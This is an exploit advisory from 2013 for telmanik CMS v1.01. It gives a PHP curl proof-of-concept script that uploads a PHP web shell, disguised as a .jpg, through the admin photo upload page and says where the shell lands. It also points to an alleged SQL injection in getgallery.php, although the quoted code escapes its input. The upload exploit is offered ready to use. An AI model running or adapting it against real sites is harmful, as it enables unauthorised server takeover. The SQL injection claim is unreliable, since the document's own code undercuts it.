facebook facebook twitter rss

telmanik cms v1.01 Multiple Vulnerabilities (admin folder)

Author: JoKeR_StEx , Published: 13-12-2013
##########################################################################

Exploit title : telmanik cms v1.01 Multiple Vulnerabilities (admin folder)

Date : 12/12/2013

Author : JoKeR_StEx

Software Link : http://www.telmanik.com/open-source.php

CVE : [~]

Version : 1.01

#########################################################################

1) File Upload

P.O.C

<?

# <3Algeria<3

$web = "http://127.0.0.1/telmanik/upload/admin/photo_upload.php";
$dz = curl_init();
$shell = "jxdz.jpg.php";
curl_setopt($dz,CURLOPT_URL,$web);
curl_setopt($dz,CURLOPT_RETURNTRANSFER,true);
curl_setopt($dz,CURLOPT_HEADER,false);
curl_setopt($dz,CURLOPT_VERBOSE,false);
curl_setopt($dz,CURLOPT_POST,true);
$jxarray = array("image1"=>"@".$shell);
curl_setopt($dz,CURLOPT_POSTFIELDS,$jxarray);
$exec=curl_exec($dz);
$end=curl_close($dz);

?>

The Shell YOu cAn Find it in /photos/

2) Sql INjection (getgallery.php)

The Bug In : getgallery.php

Line : 35...39

The C0de :
/*
if (isset($_GET['gallery'])) {
$colname_photos = $_GET['gallery'];
}
mysql_select_db($database_telmanik_press, $telmanik_press);
$query_photos = sprintf("SELECT * FROM photos WHERE gallery = %s", GetSQLValueString($colname_photos, "text"));
$photos = mysql_query($query_photos, $telmanik_press) or die(mysql_error());
$row_photos = mysql_fetch_assoc($photos);
$totalRows_photos = mysql_num_rows($photos);


*/

example :

http://127.0.0.1/telmanik/upload/admin/getgallery.php

###################################
The Black Devils , Team Dz S.O.S !/
###################################

Like us on Facebook :